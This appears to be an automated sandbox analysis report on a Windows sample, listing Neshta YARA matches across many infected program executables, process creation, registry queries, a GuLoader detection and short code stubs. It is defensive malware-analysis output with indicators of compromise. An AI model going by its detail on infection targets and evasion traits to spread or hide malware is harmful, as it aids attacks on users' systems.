                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Windows\svchost.com, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Windows\svchost.comJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exeProcess Stats: CPU usage > 98%
                  Source: Z68mMCAxFZ.exe, 00000000.00000003.672068638.0000000002237000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUndladendekand7.exe vs Z68mMCAxFZ.exe
                  Source: Z68mMCAxFZ.exe, 00000000.00000002.939439057.0000000000190000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs Z68mMCAxFZ.exe
                  Source: Z68mMCAxFZ.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Joe Sandbox ViewDropped File: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe 8FCB4C541BDDA7D5CDA8124B48BECBAFBAFE2D82116BD6356D16FF894E1D83AD
                  Source: Z68mMCAxFZ.exeVirustotal: Detection: 85%
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile read: C:\Users\user\Desktop\Z68mMCAxFZ.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Z68mMCAxFZ.exe 'C:\Users\user\Desktop\Z68mMCAxFZ.exe'
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe 'C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe'
                  Source: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe 'C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe'
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe 'C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe' Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe 'C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe' Jump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Users\user\AppData\Local\Temp\3582-490Jump to behavior
                  Source: classification engineClassification label: mal100.rans.spre.troj.evad.winEXE@5/111@0/0
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior

                  Data Obfuscation:

                  barindex
                  Yara detected GuLoaderShow sources
                  Source: Yara matchFile source: 0000000F.00000002.938917460.0000000000560000.00000040.00000001.sdmp, type: MEMORY
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040802C push 00408052h; ret 0_2_0040804A
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_004070A4 push 004070D0h; ret 0_2_004070C8
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_004041D8 push 00404204h; ret 0_2_004041FC
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_004041A0 push 004041CCh; ret 0_2_004041C4
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_00404256 push 00404284h; ret 0_2_0040427C
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_00404258 push 00404284h; ret 0_2_0040427C
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_00404210 push 0040423Ch; ret 0_2_00404234
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_004042C8 push 004042F4h; ret 0_2_004042EC
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_00404290 push 004042BCh; ret 0_2_004042B4
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_00404370 push 0040439Ch; ret 0_2_00404394
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_00404300 push 0040432Ch; ret 0_2_00404324
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_00404338 push 00404364h; ret 0_2_0040435C
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_004043E0 push 0040440Ch; ret 0_2_00404404
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_004043A8 push 004043D4h; ret 0_2_004043CC
